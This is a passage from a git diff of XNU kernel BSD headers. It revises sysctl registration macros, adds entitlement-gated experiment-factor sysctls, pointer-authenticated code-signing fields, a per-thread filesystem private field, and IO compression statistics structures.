!TARGET_OS_SIMULATOR) struct xsocket64 { u_int32_t xso_len; /* length of this structure */ u_int64_t xso_so; /* makes a convenient handle */ @@ -455,7 +458,7 @@ struct xsocket64 { struct xsockbuf so_snd; uid_t so_uid; /* XXX */ }; -#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ +#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ #ifdef PRIVATE #define XSO_SOCKET 0x001 diff --git a/bsd/sys/sysctl.h b/bsd/sys/sysctl.h index 74a04166b..c686d328a 100644 --- a/bsd/sys/sysctl.h +++ b/bsd/sys/sysctl.h @@ -83,19 +83,18 @@ #include #include #else -#ifndef XNU_KERNEL_PRIVATE +#ifdef XNU_KERNEL_PRIVATE +#include +#include +#else #include #include -#endif +#endif /* XNU_KERNEL_PRIVATE */ +#endif /* KERNEL */ -#endif #include #include -#ifdef XNU_KERNEL_PRIVATE -#include -#endif - /* * Definitions for sysctl call. The sysctl call uses a hierarchical name * for objects that can be examined or modified. The name is expressed as @@ -146,25 +145,29 @@ struct ctlname { int ctl_type; /* type of name */ }; -#define CTLTYPE 0xf /* Mask for the type */ -#define CTLTYPE_NODE 1 /* name is a node */ -#define CTLTYPE_INT 2 /* name describes an integer */ -#define CTLTYPE_STRING 3 /* name describes a string */ -#define CTLTYPE_QUAD 4 /* name describes a 64-bit number */ -#define CTLTYPE_OPAQUE 5 /* name describes a structure */ -#define CTLTYPE_STRUCT CTLTYPE_OPAQUE /* name describes a structure */ - -#define CTLFLAG_RD 0x80000000 /* Allow reads of variable */ -#define CTLFLAG_WR 0x40000000 /* Allow writes to the variable */ -#define CTLFLAG_RW (CTLFLAG_RD|CTLFLAG_WR) -#define CTLFLAG_NOLOCK 0x20000000 /* XXX Don't Lock */ -#define CTLFLAG_ANYBODY 0x10000000 /* All users can set this var */ -#define CTLFLAG_SECURE 0x08000000 /* Permit set only if securelevel<=0 */ -#define CTLFLAG_MASKED 0x04000000 /* deprecated variable, do not display */ -#define CTLFLAG_NOAUTO 0x02000000 /* do not auto-register */ -#define CTLFLAG_KERN 0x01000000 /* valid inside the kernel */ -#define CTLFLAG_LOCKED 0x00800000 /* node will handle locking itself */ -#define CTLFLAG_OID2 0x00400000 /* struct sysctl_oid has version info */ +#define CTLTYPE 0xf /* Mask for the type */ +#define CTLTYPE_NODE 1 /* name is a node */ +#define CTLTYPE_INT 2 /* name describes an integer */ +#define CTLTYPE_STRING 3 /* name describes a string */ +#define CTLTYPE_QUAD 4 /* name describes a 64-bit number */ +#define CTLTYPE_OPAQUE 5 /* name describes a structure */ +#define CTLTYPE_STRUCT CTLTYPE_OPAQUE /* name describes a structure */ + +#define CTLFLAG_RD 0x80000000 /* Allow reads of variable */ +#define CTLFLAG_WR 0x40000000 /* Allow writes to the variable */ +#define CTLFLAG_RW (CTLFLAG_RD|CTLFLAG_WR) +#define CTLFLAG_NOLOCK 0x20000000 /* XXX Don't Lock */ +#define CTLFLAG_ANYBODY 0x10000000 /* All users can set this var */ +#define CTLFLAG_SECURE 0x08000000 /* Permit set only if securelevel<=0 */ +#define CTLFLAG_MASKED 0x04000000 /* deprecated variable, do not display */ +#define CTLFLAG_NOAUTO 0x02000000 /* do not auto-register */ +#define CTLFLAG_KERN 0x01000000 /* valid inside the kernel */ +#define CTLFLAG_LOCKED 0x00800000 /* node will handle locking itself */ +#define CTLFLAG_OID2 0x00400000 /* struct sysctl_oid has version info */ +#if XNU_KERNEL_PRIVATE +#define CTLFLAG_PERMANENT 0x00200000 /* permanent sysctl_oid */ +#endif +#define CTLFLAG_EXPERIMENT 0x00100000 /* Allows writing w/ the trial experiment entitlement. */ /* * USE THIS instead of a hardwired number from the categories below @@ -179,11 +182,22 @@ struct ctlname { * in I/O-Kit. In this case, you have to call sysctl_register_oid() * manually - just like in a KEXT. */ -#define OID_AUTO (-1) -#define OID_AUTO_START 100 /* conventional */ +#define OID_AUTO (-1) +#if XNU_KERNEL_PRIVATE +/* + * Used to allow for most of the core kernel sysctl OIDs to be in immutable + * memory. The nodes that can be extensible have a fake first node with this + * particular oid_number which hangs a second mutable list from this node. + * + * This node is always first when it is used + */ +#define OID_MUTABLE_ANCHOR (INT_MIN) +#endif +#define OID_AUTO_START 100 /* conventional */ #ifdef KERNEL -#define SYSCTL_HANDLER_ARGS (struct sysctl_oid *oidp, void *arg1, int arg2, \ +#define SYSCTL_HANDLER_ARGS \ + (struct sysctl_oid *oidp __unused, void *arg1 __unused, int arg2 __unused, \ struct sysctl_req *req) @@ -286,7 +300,6 @@ int sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int void sysctl_register_oid(struct sysctl_oid *oidp); void sysctl_unregister_oid(struct sysctl_oid *oidp); -void sysctl_load_devicetree_entries(void); #define nvram_osenvironment "osenvironment" void sysctl_set_osenvironment(unsigned int size, const void* value); void sysctl_unblock_osenvironment(void); @@ -300,11 +313,6 @@ __END_DECLS #define SYSCTL_DECL(name) \ extern struct sysctl_oid_list sysctl_##name##_children -#ifdef XNU_KERNEL_PRIVATE -#define SYSCTL_LINKER_SET_ENTRY LINKER_SET_ENTRY -#else -#define SYSCTL_LINKER_SET_ENTRY(a, b) -#endif /* * Macros to define sysctl entries. Which to use? Pure data that are * returned without modification, SYSCTL_ is for you, like @@ -334,65 +342,172 @@ __END_DECLS /* This constructs a "raw" MIB oid. */ -#define SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ - { \ - &sysctl_##parent##_children, { NULL }, \ - nbr, (int)(kind|CTLFLAG_OID2), a1, (int)(a2), #name, handler, fmt, descr, SYSCTL_OID_VERSION, 0 \ +#define SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, fn, fmt, desc) { \ + .oid_parent = &sysctl_##parent##_children, \ + .oid_number = nbr, \ + .oid_kind = (int)(kind | CTLFLAG_OID2), \ + .oid_arg1 = a1, \ + .oid_arg2 = (int)(a2), \ + .oid_name = #name, \ + .oid_handler = fn, \ + .oid_fmt = fmt, \ + .oid_descr = desc, \ + .oid_version = SYSCTL_OID_VERSION, \ } +#define __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ + struct sysctl_oid sysctl_##parent##_##name = SYSCTL_STRUCT_INIT(\ + parent, nbr, name, kind, a1, a2, handler, fmt, descr) + +#if XNU_KERNEL_PRIVATE + +/* + * Core kernel registers sysctls before lockdown and protects those entries + * in immutable memory. + * + * When a node needs to support dynamic extension after lockdown, it needs to be + * declared with SYSCTL_EXTENSIBLE_NODE() to insert a dummy "OID_MUTABLE_ANCHOR" + * node in this node chain which will allow extensibility. + * + * OIDs that are to be inserted dynamically based on system properties that + * aren't known at compile time, have three options, in increasing order of + * unsafety: + * + * - The OID can use the CTLFLAG_NOAUTO flag. Such entries aren't inserted to + * the sysctl tree automatically but will be made read-only at lock down. + * + * Such entries must be inserted in the STARTUP_SUB_SYSCTL "Middle" phase + * using sysctl_register_oid_early(). + * + * - The OID can be always registered and test whether it is ready to operate. + * When it is not, it must return ENOENT which simulates an absent entry. + * + * This however has the downside that the entry is still resolvable as an MIB + * or listed in `sysctl -a` when it isn't masked. + * + * This is acceptable for sysctls that will become valid quickly during boot + * (but after lockdown). + * + * - SYSCTL_OID_MANUAL / SYSCTL_NODE_MANUAL can be used for completely + * dynamic/manual oid registration. Such nodes must be registered with + * sysctl_register_oid() after lockdown. + * + * This is the least preferred solution. + */ + +__BEGIN_DECLS +void sysctl_register_oid_early(struct sysctl_oid *oidp); +__END_DECLS + +#define SYSCTL_OID_MANUAL(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ + __XNU_PRIVATE_EXTERN \ + __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) + +#define SYSCTL_NODE_MANUAL(parent, nbr, name, access, handler, descr) \ + struct sysctl_oid_list sysctl_##parent##_##name##_children; \ + __XNU_PRIVATE_EXTERN \ + __SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access, \ + &sysctl_##parent##_##name##_children, 0, handler, "N", descr); + +#define SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ + __security_const_late __XNU_PRIVATE_EXTERN \ + __SYSCTL_OID(parent, nbr, name, CTLFLAG_PERMANENT|kind, \ + a1, a2, handler, fmt, descr); \ + __STARTUP_ARG(sysctl_##parent, _##name, \ + SYSCTL, STARTUP_RANK_SECOND, sysctl_register_oid_early, \ + &sysctl_##parent##_##name) + +#define __SYSCTL_NODE(parent, nbr, name, access, handler, descr) \ + __security_const_late \ + struct sysctl_oid_list sysctl_##parent##_##name##_children; \ + __security_const_late __XNU_PRIVATE_EXTERN \ + __SYSCTL_OID(parent, nbr, name, CTLFLAG_PERMANENT|CTLTYPE_NODE|access, \ + &sysctl_##parent##_##name##_children, 0, handler, "N", descr); \ + __STARTUP_ARG(sysctl_##parent, _##name, \ + SYSCTL, STARTUP_RANK_FIRST, sysctl_register_oid_early, \ + &sysctl_##parent##_##name) + +#define __SYSCTL_EXTENSION_NODE(name) \ + static __security_read_write \ + struct sysctl_oid_list sysctl_##name##_children_mutable; \ + static __security_const_late \ + struct sysctl_oid sysctl_##name##_wranchor = { \ + .oid_parent = &sysctl_##name##_children, \ + .oid_number = OID_MUTABLE_ANCHOR, \ + .oid_kind = CTLFLAG_OID2 | CTLFLAG_PERMANENT, \ + .oid_arg1 = &sysctl_##name##_children_mutable, \ + .oid_name = "__anchor__(" #name ")", \ + .oid_version = SYSCTL_OID_VERSION, \ + }; \ + __STARTUP_ARG(sysctl_##name, _wranchor, \ + SYSCTL, STARTUP_RANK_LAST, sysctl_register_oid_early, \ + &sysctl_##name##_wranchor) + +#define SYSCTL_NODE(parent, nbr, name, access, handler, descr) \ + __XNU_PRIVATE_EXTERN \ + __SYSCTL_NODE(parent, nbr, name, access, handler, descr) + +#define SYSCTL_EXTENSIBLE_NODE(parent, nbr, name, access, handler, descr) \ + __SYSCTL_NODE(parent, nbr, name, access, handler, descr); \ + __SYSCTL_EXTENSION_NODE(parent##_##name) +#else #define SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ - struct sysctl_oid sysctl_##parent##_##name = SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, handler, fmt, descr); \ - SYSCTL_LINKER_SET_ENTRY(__sysctl_set, sysctl_##parent##_##name) + __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) /* This constructs a node from which other oids can hang. */ -#define SYSCTL_NODE(parent, nbr, name, access, handler, descr) \ - struct sysctl_oid_list sysctl_##parent##_##name##_children; \ - SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access, \ - (void*)&sysctl_##parent##_##name##_children, 0, handler, \ - "N", descr) +#define SYSCTL_NODE(parent, nbr, name, access, handler, descr) \ + struct sysctl_oid_list sysctl_##parent##_##name##_children; \ + SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access, \ + &sysctl_##parent##_##name##_children, 0, handler, "N", descr) +#endif /* XNU_KERNEL_PRIVATE */ /* Oid for a string. len can be 0 to indicate '\0' termination. */ #define SYSCTL_STRING(parent, nbr, name, access, arg, len, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_STRING|access, \ - arg, len, sysctl_handle_string, "A", descr) + arg, len, sysctl_handle_string, "A", descr) #define SYSCTL_COMPAT_INT(parent, nbr, name, access, ptr, val, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, val, sysctl_handle_int, "I", descr) + ptr, val, sysctl_handle_int, "I", descr) #define SYSCTL_COMPAT_UINT(parent, nbr, name, access, ptr, val, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, val, sysctl_handle_int, "IU", descr) + ptr, val, sysctl_handle_int, "IU", descr) /* Oid for an int. If ptr is NULL, val is returned. */ #define SYSCTL_INT(parent, nbr, name, access, ptr, val, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, val, sysctl_handle_int, "I", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(int)) ? 0 : -1] + ptr, val, sysctl_handle_int, "I", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(int), \ + "must be integer sized"); /* Oid for an unsigned int. If ptr is NULL, val is returned. */ #define SYSCTL_UINT(parent, nbr, name, access, ptr, val, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, val, sysctl_handle_int, "IU", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned int)) ? 0 : -1] + ptr, val, sysctl_handle_int, "IU", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned int), \ + "must be integer sized"); /* Oid for a long. The pointer must be non NULL. */ #define SYSCTL_LONG(parent, nbr, name, access, ptr, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, 0, sysctl_handle_long, "L", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long)) ? 0 : -1] + ptr, 0, sysctl_handle_long, "L", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long), \ + "must be long sized"); /* Oid for a unsigned long. The pointer must be non NULL. */ #define SYSCTL_ULONG(parent, nbr, name, access, ptr, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, 0, sysctl_handle_long, "LU", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned long)) ? 0 : -1] + ptr, 0, sysctl_handle_long, "LU", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned long), \ + "must be long sized"); /* Oid for a quad. The pointer must be non NULL. */ #define SYSCTL_QUAD(parent, nbr, name, access, ptr, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_QUAD|access, \ - ptr, 0, sysctl_handle_quad, "Q", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long long)) ? 0 : -1] + ptr, 0, sysctl_handle_quad, "Q", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long long), \ + "must be long long sized"); /* Oid for an opaque object. Specified by a pointer and a length. */ #define SYSCTL_OPAQUE(parent, nbr, name, access, ptr, len, fmt, descr) \ @@ -402,8 +517,8 @@ __END_DECLS /* Oid for a struct. Specified by a pointer and a type. */ #define SYSCTL_STRUCT(parent, nbr, name, access, ptr, type, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_OPAQUE|access, \ - ptr, sizeof(struct type), sysctl_handle_opaque, \ - "S," #type, descr) + ptr, sizeof(struct type), sysctl_handle_opaque, \ + "S," #type, descr) /* * Oid for a procedure. Specified by a pointer and an arg. @@ -412,8 +527,111 @@ __END_DECLS */ #define SYSCTL_PROC(parent, nbr, name, access, ptr, arg, handler, fmt, descr) \ SYSCTL_OID(parent, nbr, name, access, \ - ptr, arg, handler, fmt, descr) + ptr, arg, handler, fmt, descr) + +/* + * The EXPERIMENT macros below expose values for on-device experimentation (A/B testing) via Trial. + * These values will be set shortly after boot by the KRExperiments framework based on any + * active experiments on the device. + * Values exposed via these macros are still normal sysctls and can be set by the superuser in the + * development or debug kernel. However, on the release kernel they can ONLY be set by processes + * with the com.apple.private.write-kr-experiment-factors entitlement. + * In addition, for numeric types, special macros are provided that enforce a valid range for the value (inclusive) + * to ensure that an errant experiment can't set a totally unexpected value. These macros also track which + * values have been modified via sycstl(3) so that they can be inspected with the showexperiments lldb macro. + */ + +struct experiment_spec { + void *ptr; /* ptr to numeric experiment factor. */ + uint64_t min_value; /* Min value that can be set via sysctl(3) (inclusive). */ + uint64_t max_value; /* Max value that can be set via sysctl(3) (inclusive). */ + uint64_t original_value; /* First value that was overwritten via sysctl(3). */ + _Atomic bool modified; /* Has this value ever been overwritten via sysctl(3)? */ +}; + +/* + * The handlers for the numeric types can be easily parameterized by type. + * So they're defined via an X macro. + */ +#define experiment_factor_numeric_types \ + X(uint, unsigned int) \ + X(int, int) \ + X(ulong, unsigned long) \ + X(long, long) \ + X(uint64, uint64_t) \ + X(int64, int64_t) + +#define X(experiment_factor_typename, _) \ +int experiment_factor_##experiment_factor_typename##_handler SYSCTL_HANDLER_ARGS; + +experiment_factor_numeric_types +#undef X + +#define __EXPERIMENT_FACTOR_SPEC(parent, name, p, min, max) \ + struct experiment_spec experiment_##parent##_##name = { \ + .ptr = p, \ + .min_value = min, \ + .max_value = max, \ + .original_value = 0, \ + .modified = false \ + } + +#define EXPERIMENT_FACTOR_UINT(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(unsigned int), "must be integer sized"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_uint_handler, "IU", descr); + +#define EXPERIMENT_FACTOR_INT(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(int), "must be integer sized"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_int_handler, "I", descr); + +#define EXPERIMENT_FACTOR_ULONG(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(unsigned long), "must be long sized"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_ulong_handler, "LU", descr); +#define EXPERIMENT_FACTOR_LONG(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(long), "must be long sized"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_long_handler, "L", descr); + +#define EXPERIMENT_FACTOR_UINT64(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(uint64_t), "must be 8 bytes"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_uint64_handler, "QU", descr); + +#define EXPERIMENT_FACTOR_INT64(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(int64_t), "must be 8 bytes"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_int64_handler, "Q", descr); + +/* + * Calls an user provided handler to read / write this factor. + * Entitlement checking will still be done by sysctl, but it's the callers responsibility to validate any new values. + * This factor will not be printed out via the showexperiments lldb macro. + */ +#define EXPERIMENT_FACTOR_PROC(parent, name, access, ptr, arg, handler, fmt, descr) \ + _Static_assert(arg != 1, "arg can not be 1") \ + SYSCTL_PROC(parent, OID_AUTO, name, access | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, ptr, arg, handler, fmt, descr); + +#ifdef XNU_KERNEL_PRIVATE +/* + * Sysctl handler for reading a simple counter. + * Using this directly is not recommended. Use the SYSCTL_SCALABLE_COUNTER macro + */ +int scalable_counter_sysctl_handler SYSCTL_HANDLER_ARGS; + +/*! + * @macro SYSCTL_SCALABLE_COUNTER + * + * @abstract + * Provides a sysctl for reading the value of a percpu counter. + */ +#define SYSCTL_SCALABLE_COUNTER(parent, name, counter, descr) \ +SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED, \ + (void *)(&counter), 0, &scalable_counter_sysctl_handler, "Q", descr); +#endif /* XNU_KERNEL_PRIVATE */ extern struct sysctl_oid_list sysctl__children; SYSCTL_DECL(_kern); @@ -1172,16 +1390,8 @@ extern char macosproductversion[]; extern char macosversion[]; #endif -struct linker_set; - -void sysctl_register_set(const char *set); -void sysctl_unregister_set(const char *set); void sysctl_mib_init(void); - -int sysctl_int(user_addr_t, size_t *, user_addr_t, size_t, int *); -int sysctl_quad(user_addr_t, size_t *, user_addr_t, size_t, quad_t *); - -void sysctl_early_init(void); +void hvg_bsd_init(void); #endif /* BSD_KERNEL_PRIVATE */ #else /* !KERNEL */ diff --git a/bsd/sys/systm.h b/bsd/sys/systm.h index 8066c95f8..ee460934b 100644 --- a/bsd/sys/systm.h +++ b/bsd/sys/systm.h @@ -232,7 +232,8 @@ uint32_t throttle_lowpri_io(int sleep_amount); /* returns TRUE if the throttle_lowpri_io called with the same sleep_amount would've slept */ int throttle_lowpri_io_will_be_throttled(int sleep_amount); void throttle_set_thread_io_policy(int policy); -int throttle_get_thread_effective_io_policy(void); +int throttle_get_thread_effective_io_policy(void); +int throttle_thread_io_tier_above_metadata(void); typedef struct __throttle_info_handle *throttle_info_handle_t; int throttle_info_ref_by_mask(uint64_t throttle_mask, throttle_info_handle_t *throttle_info_handle); diff --git a/bsd/sys/tty.h b/bsd/sys/tty.h index b849f3aeb..2fdf66a4c 100644 --- a/bsd/sys/tty.h +++ b/bsd/sys/tty.h @@ -336,6 +336,11 @@ extern void ttyhold(struct tty *tp); #define PTS_MAJOR 4 #define PTC_MAJOR 5 +/* + * If you need accounting consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_TTYS KHEAP_DEFAULT #endif /* defined(XNU_KERNEL_PRIVATE) */ __END_DECLS diff --git a/bsd/sys/ubc_internal.h b/bsd/sys/ubc_internal.h index 50f97527a..562a3e20e 100644 --- a/bsd/sys/ubc_internal.h +++ b/bsd/sys/ubc_internal.h @@ -109,7 +109,7 @@ struct cs_blob { off_t csb_end_offset; /* Blob coverage area end, from csb_base_offset */ vm_size_t csb_mem_size; vm_offset_t csb_mem_offset; - vm_address_t csb_mem_kaddr; + void * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_mem_kaddr") csb_mem_kaddr; unsigned char csb_cdhash[CS_CDHASH_LEN]; ptrauth_generic_signature_t csb_cdhash_signature; const struct cs_hash *csb_hashtype; @@ -125,6 +125,7 @@ struct cs_blob { char * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_supplement_teamid") csb_supplement_teamid; #endif const CS_GenericBlob * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_entitlements_blob") csb_entitlements_blob; /* raw blob, subrange of csb_mem_kaddr */ + ptrauth_generic_signature_t csb_entitlements_blob_signature; void * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_entitlements") csb_entitlements; /* The entitlements as an OSDictionary */ unsigned int csb_signer_type; unsigned int csb_reconstituted; /* signature has potentially been modified after validation */ diff --git a/bsd/sys/ucred.h b/bsd/sys/ucred.h index 08be2fc3a..d1b3c1aaa 100644 --- a/bsd/sys/ucred.h +++ b/bsd/sys/ucred.h @@ -107,6 +107,9 @@ struct ucred { uid_t cr_ruid; /* real user id */ uid_t cr_svuid; /* saved user id */ u_short cr_ngroups; /* number of groups in advisory list */ +#if XNU_KERNEL_PRIVATE + u_short __cr_padding; +#endif gid_t cr_groups[NGROUPS];/* advisory group list */ gid_t cr_rgid; /* real group id */ gid_t cr_svgid; /* saved group id */ diff --git a/bsd/sys/unpcb.h b/bsd/sys/unpcb.h index 502aae89a..5867dcb2d 100644 --- a/bsd/sys/unpcb.h +++ b/bsd/sys/unpcb.h @@ -68,6 +68,9 @@ #include #include #include +#if !KERNEL && PRIVATE +#include +#endif /* * Protocol control block for an active @@ -204,7 +207,7 @@ struct xunpcb { u_quad_t xu_alignment_hack; }; -#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) +#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) struct xunpcb64_list_entry { u_int64_t le_next; @@ -238,7 +241,7 @@ struct xunpcb64 { struct xsocket64 xu_socket; }; -#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ +#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ #pragma pack() diff --git a/bsd/sys/user.h b/bsd/sys/user.h index 53fdcdb94..9a2934f4e 100644 --- a/bsd/sys/user.h +++ b/bsd/sys/user.h @@ -332,6 +332,9 @@ struct uthread { /* Document Tracking struct used to track a "tombstone" for a document */ struct doc_tombstone *t_tombstone; + /* Field to be used by filesystems */ + uint64_t t_fs_private; + struct os_reason *uu_exit_reason; }; diff --git a/bsd/sys/vnode.h b/bsd/sys/vnode.h index 0ae525055..aa0cd6aa4 100644 --- a/bsd/sys/vnode.h +++ b/bsd/sys/vnode.h @@ -70,7 +70,9 @@ #include #include #include -#endif +#else +#include +#endif /* KERNEL */ /* * The vnode is the focus of all file activity in UNIX. There is a @@ -1513,6 +1515,30 @@ int vfs_ctx_skipatime(vfs_context_t ctx); #endif +/* Supported filesystem tags for vfs_[set|get]_thread_fs_private */ +#define FS_PRIVATE_TAG_APFS (1) + +/*! + * @function vfs_set_thread_fs_private + * @abstract Set the per-thread filesystem private data field. + * @discussion Allows a filesystem to store an implementation specific value in the thread struct. + * Note that this field is common to all filesystems thus re-entrancy should be taken into consideration. + * @param tag Filesystem identification tag. + * @param fs_private The value to be set. + * @return 0 for success, ENOTSUP if the filesystem tag is not supported. + */ +int vfs_set_thread_fs_private(uint8_t tag, uint64_t fs_private); + +/*! + * @function vfs_get_thread_fs_private + * @abstract Return the per-thread filesystem private data field. + * @discussion Returns the per-thread value that was set by vfs_set_thread_fs_private(). + * @param tag Filesystem identification tag. + * @param fs_private The stored per-thread value. + * @return 0 for success, ENOTSUP if the filesystem tag is not supported. + */ +int vfs_get_thread_fs_private(uint8_t tag, uint64_t *fs_private); + /*! * @function vflush * @abstract Reclaim the vnodes associated with a mount. @@ -2421,6 +2447,9 @@ vnode_t vfs_context_get_cwd(vfs_context_t); /* get cwd with iocount */ int vnode_isnoflush(vnode_t); void vnode_setnoflush(vnode_t); void vnode_clearnoflush(vnode_t); +#if CONFIG_IO_COMPRESSION_STATS +void vnode_iocs_record_and_free(vnode_t); +#endif /* CONFIG_IO_COMPRESSION_STATS */ #define BUILDPATH_NO_FS_ENTER 0x1 /* Use cache values, do not enter file system */ #define BUILDPATH_CHECKACCESS 0x2 /* Check if parents have search rights */ @@ -2439,4 +2468,34 @@ __END_DECLS #endif /* KERNEL */ +/* + * Structure for vnode level IO compression stats + */ + +#define IOCS_BUFFER_NUM_SIZE_BUCKETS 10 +#define IOCS_BUFFER_MAX_BUCKET 9 +#define IOCS_BUFFER_NUM_COMPRESSION_BUCKETS 7 +#define IOCS_BLOCK_NUM_SIZE_BUCKETS 16 + +struct io_compression_stats { + uint64_t uncompressed_size; + uint64_t compressed_size; + uint32_t buffer_size_compression_dist[IOCS_BUFFER_NUM_SIZE_BUCKETS][IOCS_BUFFER_NUM_COMPRESSION_BUCKETS]; + uint32_t block_compressed_size_dist[IOCS_BLOCK_NUM_SIZE_BUCKETS]; +}; +typedef struct io_compression_stats *io_compression_stats_t; + +#define IOCS_SBE_PATH_LEN 128 +#define IOCS_PATH_START_BYTES_TO_COPY 108 +#define IOCS_PATH_END_BYTES_TO_COPY 20 /* Includes null termination */ + +#define IOCS_SYSCTL_LIVE 0x00000001 +#define IOCS_SYSCTL_STORE_BUFFER_RD_ONLY 0x00000002 +#define IOCS_SYSCTL_STORE_BUFFER_MARK 0x00000004 + +struct iocs_store_buffer_entry { + char path_name[IOCS_SBE_PATH_LEN]; + struct io_compression_stats iocs; +}; + #endif /* !_VNODE_H_ */ diff --git a/bsd/sys/vnode_internal.h b/bsd/sys/vnode_internal.h index a25c11c3e..4af412789 100644 --- a/bsd/sys/vnode_internal.h +++ b/bsd/sys/vnode_internal.h @@ -121,7 +121,7 @@ typedef struct vnode_resolve *vnode_resolve_t; * v_freelist is locked by the global vnode_list_lock * v_mntvnodes is locked by the mount_lock * v_nclinks and v_ncchildren are protected by the global name_cache_lock - * v_cleanblkhd and v_dirtyblkhd and v_iterblkflags are locked via the global buf_mtxp + * v_cleanblkhd and v_dirtyblkhd and v_iterblkflags are locked via the global buf_mtx * the rest of the structure is protected by the vnode_lock */ struct vnode { @@ -184,6 +184,9 @@ struct vnode { * if VFLINKTARGET is set, if VFLINKTARGET is not * set, points to target */ #endif /* CONFIG_FIRMLINKS */ +#if CONFIG_IO_COMPRESSION_STATS + io_compression_stats_t io_compression_stats; /* IO compression statistics */ +#endif /* 